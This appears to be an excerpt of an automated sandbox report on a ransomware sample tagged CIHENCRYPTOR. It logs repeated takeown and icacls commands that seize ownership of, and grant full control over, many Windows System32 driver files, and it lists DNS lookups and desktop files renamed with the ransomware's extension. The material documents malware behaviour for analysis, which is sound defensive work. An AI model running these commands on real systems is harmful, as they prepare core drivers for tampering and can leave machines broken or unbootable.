icacls C:\Windows\System32\drivers\mouhid.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msfs.sys && icacls C:\Windows\System32\drivers\msfs.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mouclass.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msgpioclx.sys && icacls C:\Windows\System32\drivers\msgpioclx.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mountmgr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mpsdrv.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mrxdav.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mrxsmb.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msgpiowin32.sys && icacls C:\Windows\System32\drivers\msgpiowin32.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mrxsmb20.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mountmgr.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mrxdav.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidkmdf.sys && icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msfs.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msgpioclx.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidumdf.sys && icacls C:\Windows\System32\drivers\mshidumdf.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msgpiowin32.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msfs.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msgpioclx.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshwnclx.sys && icacls C:\Windows\System32\drivers\mshwnclx.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msgpiowin32.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mshidkmdf.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msisadrv.sys && icacls C:\Windows\System32\drivers\msisadrv.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msiscsi.sys && icacls C:\Windows\System32\drivers\msiscsi.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mshidumdf.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mskssrv.sys && icacls C:\Windows\System32\drivers\mskssrv.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mshwnclx.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mslldp.sys && icacls C:\Windows\System32\drivers\mslldp.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mshidumdf.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msisadrv.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspclock.sys && icacls C:\Windows\System32\drivers\mspclock.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msiscsi.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspqm.sys && icacls C:\Windows\System32\drivers\mspqm.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mshwnclx.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msisadrv.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mskssrv.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msiscsi.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msquic.sys && icacls C:\Windows\System32\drivers\msquic.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mslldp.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mskssrv.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mspclock.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msrpc.sys && icacls C:\Windows\System32\drivers\msrpc.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mspclock.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mslldp.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mssmbios.sys && icacls C:\Windows\System32\drivers\mssmbios.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mstee.sys && icacls C:\Windows\System32\drivers\mstee.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msquic.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mspqm.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MTConfig.sys && icacls C:\Windows\System32\drivers\MTConfig.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\msrpc.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mspqm.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msquic.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mup.sys && icacls C:\Windows\System32\drivers\mup.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\msrpc.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mvumis.sys && icacls C:\Windows\System32\drivers\mvumis.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mstee.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mssmbios.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndfltr.sys && icacls C:\Windows\System32\drivers\ndfltr.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mssmbios.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\MTConfig.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndis.sys && icacls C:\Windows\System32\drivers\ndis.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mstee.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mup.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\MTConfig.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiscap.sys && icacls C:\Windows\System32\drivers\ndiscap.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mvumis.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndfltr.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mvumis.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mup.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndfltr.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NdisImPlatform.sys && icacls C:\Windows\System32\drivers\NdisImPlatform.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndistapi.sys && icacls C:\Windows\System32\drivers\ndistapi.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndis.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndisuio.sys && icacls C:\Windows\System32\drivers\ndisuio.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndiscap.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NdisVirtualBus.sys && icacls C:\Windows\System32\drivers\NdisVirtualBus.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\NdisImPlatform.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndis.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndiscap.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiswan.sys && icacls C:\Windows\System32\drivers\ndiswan.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NDKPing.sys && icacls C:\Windows\System32\drivers\NDKPing.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\NdisImPlatform.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndproxy.sys && icacls C:\Windows\System32\drivers\ndproxy.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndistapi.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndisuio.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\NdisVirtualBus.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Ndu.sys && icacls C:\Windows\System32\drivers\Ndu.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndisuio.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NetAdapterCx.sys && icacls C:\Windows\System32\drivers\NetAdapterCx.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndistapi.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndiswan.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ndproxy.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\NDKPing.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\NdisVirtualBus.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbios.sys && icacls C:\Windows\System32\drivers\netbios.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Ndu.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbt.sys && icacls C:\Windows\System32\drivers\netbt.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\NetAdapterCx.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\NDKPing.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndiswan.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ndproxy.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netio.sys && icacls C:\Windows\System32\drivers\netio.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Ndu.sys /grant "Admin:F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\netbios.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\NetAdapterCx.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netvsc.sys && icacls C:\Windows\System32\drivers\netvsc.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\netbt.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npfs.sys && icacls C:\Windows\System32\drivers\npfs.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\netbios.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npsvctrig.sys && icacls C:\Windows\System32\drivers\npsvctrig.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nsiproxy.sys && icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\netbt.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\netio.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\netvsc.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntfs.sys && icacls C:\Windows\System32\drivers\ntfs.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\netvsc.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\netio.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntosext.sys && icacls C:\Windows\System32\drivers\ntosext.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\npfs.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\null.sys && icacls C:\Windows\System32\drivers\null.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nsiproxy.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\npsvctrig.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvdimm.sys && icacls C:\Windows\System32\drivers\nvdimm.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvraid.sys && icacls C:\Windows\System32\drivers\nvraid.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\npsvctrig.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ntfs.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ntosext.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\npfs.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvstor.sys && icacls C:\Windows\System32\drivers\nvstor.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ntfs.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nwifi.sys && icacls C:\Windows\System32\drivers\nwifi.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ntosext.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\null.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nvdimm.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nvraid.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pacer.sys && icacls C:\Windows\System32\drivers\pacer.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\parport.sys && icacls C:\Windows\System32\drivers\parport.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\null.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nvstor.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nvdimm.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nvraid.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\nwifi.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\partmgr.sys && icacls C:\Windows\System32\drivers\partmgr.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pacer.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pci.sys && icacls C:\Windows\System32\drivers\pci.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nvstor.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciide.sys && icacls C:\Windows\System32\drivers\pciide.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\nwifi.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pacer.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciidex.sys && icacls C:\Windows\System32\drivers\pciidex.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcmcia.sys && icacls C:\Windows\System32\drivers\pcmcia.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcw.sys && icacls C:\Windows\System32\drivers\pcw.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\partmgr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pci.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pciide.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pciidex.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\parport.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pdc.sys && icacls C:\Windows\System32\drivers\pdc.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pcmcia.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pciidex.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pciide.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\parport.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pci.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\partmgr.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PEAuth.sys && icacls C:\Windows\System32\drivers\PEAuth.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pcw.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\percsas2i.sys && icacls C:\Windows\System32\drivers\percsas2i.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pcmcia.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\percsas3i.sys && icacls C:\Windows\System32\drivers\percsas3i.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pcw.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\pdc.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\PEAuth.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PktMon.sys && icacls C:\Windows\System32\drivers\PktMon.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\percsas2i.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\pdc.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\PEAuth.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pmem.sys && icacls C:\Windows\System32\drivers\pmem.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\percsas2i.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pnpmem.sys && icacls C:\Windows\System32\drivers\pnpmem.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\percsas3i.sys
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
Files
C:\Users\Admin\Desktop\DenyBlock.svgz.CIHENCRYPTOR
C:\Users\Admin\Desktop\GroupFind.ppsm.CIHENCRYPTOR
C:\Windows\System32\kill.ico
C:\Users\Admin\Desktop\○►®σ♥óñ¥↑♫Ÿ×œ4≈5╤5╠Æ×◘õ►☼☺õ½◙59▲5♥∩19σ±9♀«☼8₧Ÿ↕√8↕šÂ±≈ž◙ï¥Σ♂9◘¤∞4╚é╤71²Ÿ♪₧¥◄◘▼ř╥♀²♫π♠▌øœ▐²♠▐☼↑™σ♫◄♀±